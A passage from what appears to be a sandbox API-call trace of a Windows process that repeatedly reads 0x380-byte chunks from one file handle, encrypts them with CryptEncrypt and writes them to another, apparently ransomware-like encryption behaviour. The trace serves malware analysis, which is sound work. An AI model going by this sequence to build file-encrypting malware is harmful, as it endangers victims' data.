pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.831] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.831] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.831] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.831] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.831] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.831] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.831] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.831] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.832] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.832] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.832] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.832] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.832] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.832] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.832] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.832] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.832] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.832] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.832] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.832] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.832] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.833] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.833] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.833] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.833] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.833] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.833] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.833] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.833] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.833] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.833] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.833] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.833] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.833] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.834] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.834] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.834] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.834] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.834] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.834] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.834] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.835] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.835] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.836] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.836] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.836] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.836] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.836] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.836] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.836] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.836] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.836] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.837] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.837] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.837] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.837] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.837] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.837] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.837] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.837] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.837] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.837] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.838] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.838] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.838] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.838] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.838] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.838] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.838] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.838] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.838] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.839] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.839] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.839] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.839] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.839] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.839] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.839] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.839] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.839] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.839] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.840] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.840] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.840] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.840] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.840] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.840] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.840] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.840] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.840] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.840] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.841] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.841] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.841] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.841] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.841] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.841] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.841] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.841] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.841] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.841] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0272.841] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0272.842] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: 